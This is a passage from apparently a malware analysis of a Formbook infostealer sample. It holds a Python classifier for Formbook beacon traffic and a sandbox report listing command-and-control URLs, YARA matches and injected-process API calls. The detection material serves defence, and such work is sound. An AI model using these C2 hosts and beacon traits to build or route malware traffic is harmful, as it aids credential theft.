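    req = parse_request(raw)
    c2_hosts, c2_paths = c2_hosts_and_paths(config)
    decoys = {normalize_host(d) for d in config["decoy"]}
    host = normalize_host(req["headers"].get("host", ""))
    role = "c2" if host in c2_hosts else "decoy" if host in decoys else "unknown"
    path_match = req["path"] in c2_paths
    no_ua = "user-agent" not in req["headers"]
    verdict = "formbook-beacon" if (role != "unknown" and path_match and no_ua) else "no-match"
    return {"host": host, "role": role, "path_match": path_match,
            "no_user_agent": no_ua, "query": req["query"], "verdict": verdict}


def classify_observed() -> list[dict]:
    """Classify the four requests from the report."""
    return [classify(r) for r in OBSERVED_REQUESTS]


if __name__ == "__main__":
    for result in classify_observed():
        print(result["verdict"], result["role"], result["host"], result["query"].get("vT"))
```

The path and the absence of a User-Agent are the cheap network-side checks; the host lists make the match specific to this configuration. Since the query values are opaque, the example only records them, and the constant second parameter is something to pivot on across samples rather than something the page explains.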
          Source: explorer.exe, 00000006.00000000.2026275554.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2026275554.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4448347462.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4448347462.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: explorer.exe, 00000006.00000002.4443289671.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2011068724.0000000000F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
          Source: explorer.exe, 00000006.00000000.2026275554.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2026275554.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4448347462.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4448347462.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 00000006.00000000.2026275554.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2026275554.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4448347462.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4448347462.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: explorer.exe, 00000006.00000000.2026275554.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2026275554.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4448347462.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4448347462.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 00000006.00000000.2026275554.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4448347462.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: explorer.exe, 00000006.00000000.2024943669.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4447767327.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4447077896.0000000007DC0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: Pago pendiente.exe, 00000000.00000002.2008580882.00000000034E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: Pago pendiente.exeString found in binary or memory: http://tempuri.org/DataSet1.xsd
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.51win.ink
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.51win.ink/gs12/
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.51win.ink/gs12/ch_cf
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.51win.inkReferer:
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.actnowgreen.com
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.actnowgreen.com/gs12/
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.actnowgreen.com/gs12/www.udin88b.us
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.actnowgreen.comReferer:
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.airzf.com
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.airzf.com/gs12/
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.airzf.com/gs12/www.actnowgreen.com
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.airzf.comReferer:
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eternalknot1008.com
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eternalknot1008.com/gs12/
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eternalknot1008.com/gs12/www.zgcple.info
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eternalknot1008.comReferer:
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hjgd.xyz
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hjgd.xyz/gs12/
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hjgd.xyz/gs12/www.airzf.com
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hjgd.xyzReferer:

          E-Banking Fraud

          Source: Yara match | File source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000007.00000002.4443703751.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.4443748619.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.2011441165.0000000004DCF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.2011441165.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.4443703751.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.4443703751.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.4443703751.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.4443748619.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.4443748619.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.4443748619.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.2011441165.0000000004DCF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.2011441165.0000000004DCF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.2011441165.0000000004DCF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.2011441165.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.2011441165.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.2011441165.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.4458911697.000000000E4E6000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
          Source: Process Memory Space: Pago pendiente.exe PID: 5824, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: RegSvcs.exe PID: 5840, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: control.exe PID: 1644, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Pago pendiente.exe, Program.cs | Large array initialization: array initializer size 566442
          Source: 0.2.Pago pendiente.exe.7700000.11.raw.unpack, HomeView.cs | Large array initialization: array initializer size 33604
          Source: 0.2.Pago pendiente.exe.32f8498.5.raw.unpack, HomeView.cs | Large array initialization: array initializer size 33604
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_0041A360 NtCreateFile | 5_2_0041A360
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_0041A410 NtReadFile | 5_2_0041A410
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_0041A490 NtClose | 5_2_0041A490
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_0041A540 NtAllocateVirtualMemory | 5_2_0041A540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_0041A35A NtCreateFile | 5_2_0041A35A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_0041A53B NtAllocateVirtualMemory | 5_2_0041A53B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_01472B60 NtClose, LdrInitializeThunk | 5_2_01472B60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_01472BF0 NtAllocateVirtualMemory, LdrInitializeThunk | 5_2_01472BF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_01472AD0 NtReadFile, LdrInitializeThunk | 5_2_01472AD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_01472D10 NtMapViewOfSection, LdrInitializeThunk | 5_2_01472D10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_01472D30 NtUnmapViewOfSection, LdrInitializeThunk | 5_2_01472D30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_01472DD0 NtDelayExecution, LdrInitializeThunk | 5_2_01472DD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_01472DF0 NtQuerySystemInformation, LdrInitializeThunk | 5_2_01472DF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_01472C70 NtFreeVirtualMemory, LdrInitializeThunk | 5_2_01472C70
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_01472CA0 NtQueryInformationToken, LdrInitializeThunk | 5_2_01472CA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_01472F30 NtCreateSection, LdrInitializeThunk | 5_2_01472F30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_01472FE0 NtCreateFile, LdrInitializeThunk | 5_2_01472FE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_01472F90 NtProtectVirtualMemory, LdrInitializeThunk | 5_2_01472F90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_01472FB0 NtResumeThread, LdrInitializeThunk | 5_2_01472FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_01472E80 NtReadVirtualMemory, LdrInitializeThunk | 5_2_01472E80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_01472EA0 NtAdjustPrivilegesToken, LdrInitializeThunk | 5_2_01472EA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_01474340 NtSetContextThread | 5_2_01474340
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_01474650 NtSuspendThread | 5_2_01474650
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_01472BE0 NtQueryValueKey | 5_2_01472BE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_01472B80 NtQueryInformationFile | 5_2_01472B80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_01472BA0 NtEnumerateValueKey | 5_2_01472BA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_01472AF0 NtWriteFile | 5_2_01472AF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_01472AB0 NtWaitForSingleObject | 5_2_01472AB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_01472D00 NtSetInformationFile | 5_2_01472D00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_01472DB0 NtEnumerateKey | 5_2_01472DB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_01472C60 NtCreateKey | 5_2_01472C60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_01472C00 NtQueryInformationProcess | 5_2_01472C00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_01472CC0 NtQueryVirtualMemory | 5_2_01472CC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_01472CF0 NtOpenProcess | 5_2_01472CF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_01472F60 NtCreateProcessEx | 5_2_01472F60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_01472FA0 NtQuerySection | 5_2_01472FA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_01472E30 NtWriteVirtualMemory | 5_2_01472E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_01472EE0 NtQueueApcThread | 5_2_01472EE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_01473010 NtOpenDirectoryObject | 5_2_01473010
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_01473090 NtSetValueKey | 5_2_01473090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_014735C0 NtCreateMutant | 5_2_014735C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_014739B0 NtGetContextThread | 5_2_014739B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_01473D70 NtOpenThread | 5_2_01473D70
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_01473D10 NtOpenProcessToken | 5_2_01473D10
          Source: C:\Windows\explorer.exe | Code function: 6_2_0E4CFE12 NtProtectVirtualMemory | 6_2_0E4CFE12
          Source: C:\Windows\explorer.exe | Code function: 6_2_0E4CE232 NtCreateFile | 6_2_0E4CE232
          Source: C:\Windows\explorer.exe | Code function: 6_2_0E4CFE0A NtProtectVirtualMemory | 6_2_0E4CFE0A
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04822CA0 NtQueryInformationToken, LdrInitializeThunk | 7_2_04822CA0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04822C60 NtCreateKey, LdrInitializeThunk | 7_2_04822C60
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04822C70 NtFreeVirtualMemory, LdrInitializeThunk | 7_2_04822C70
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04822DD0 NtDelayExecution, LdrInitializeThunk | 7_2_04822DD0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04822DF0 NtQuerySystemInformation, LdrInitializeThunk | 7_2_04822DF0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04822D10 NtMapViewOfSection, LdrInitializeThunk | 7_2_04822D10
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04822EA0 NtAdjustPrivilegesToken, LdrInitializeThunk | 7_2_04822EA0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04822FE0 NtCreateFile, LdrInitializeThunk | 7_2_04822FE0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04822F30 NtCreateSection, LdrInitializeThunk | 7_2_04822F30
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04822AD0 NtReadFile, LdrInitializeThunk | 7_2_04822AD0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04822BE0 NtQueryValueKey, LdrInitializeThunk | 7_2_04822BE0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04822BF0 NtAllocateVirtualMemory, LdrInitializeThunk | 7_2_04822BF0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04822B60 NtClose, LdrInitializeThunk | 7_2_04822B60
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_048235C0 NtCreateMutant, LdrInitializeThunk | 7_2_048235C0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04824650 NtSuspendThread | 7_2_04824650
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04824340 NtSetContextThread | 7_2_04824340
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04822CC0 NtQueryVirtualMemory | 7_2_04822CC0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04822CF0 NtOpenProcess | 7_2_04822CF0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04822C00 NtQueryInformationProcess | 7_2_04822C00
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04822DB0 NtEnumerateKey | 7_2_04822DB0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04822D00 NtSetInformationFile | 7_2_04822D00
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04822D30 NtUnmapViewOfSection | 7_2_04822D30
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04822E80 NtReadVirtualMemory | 7_2_04822E80
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04822EE0 NtQueueApcThread | 7_2_04822EE0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04822E30 NtWriteVirtualMemory | 7_2_04822E30
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04822F90 NtProtectVirtualMemory | 7_2_04822F90
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04822FA0 NtQuerySection | 7_2_04822FA0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04822FB0 NtResumeThread | 7_2_04822FB0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04822F60 NtCreateProcessEx | 7_2_04822F60
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04822AB0 NtWaitForSingleObject | 7_2_04822AB0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04822AF0 NtWriteFile | 7_2_04822AF0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04822B80 NtQueryInformationFile | 7_2_04822B80
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04822BA0 NtEnumerateValueKey | 7_2_04822BA0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04823090 NtSetValueKey | 7_2_04823090
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04823010 NtOpenDirectoryObject | 7_2_04823010
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04823D10 NtOpenProcessToken | 7_2_04823D10
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_04823D70 NtOpenThread | 7_2_04823D70
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_048239B0 NtGetContextThread | 7_2_048239B0
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_025BA360 NtCreateFile | 7_2_025BA360
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_025BA410 NtReadFile | 7_2_025BA410
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_025BA490 NtClose | 7_2_025BA490
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_025BA540 NtAllocateVirtualMemory | 7_2_025BA540
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_025BA35A NtCreateFile | 7_2_025BA35A
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_025BA53B NtAllocateVirtualMemory | 7_2_025BA53B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00409E605_2_00409E60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0041D6A45_2_0041D6A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00402FB05_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014C81585_2_014C8158
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014301005_2_01430100
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014DA1185_2_014DA118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014F81CC5_2_014F81CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014F41A25_2_014F41A2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_015001AA5_2_015001AA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014D20005_2_014D2000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014FA3525_2_014FA352
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0144E3F05_2_0144E3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_015003E65_2_015003E6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014E02745_2_014E0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014C02C05_2_014C02C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014405355_2_01440535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_015005915_2_01500591
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014F24465_2_014F2446
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014E44205_2_014E4420
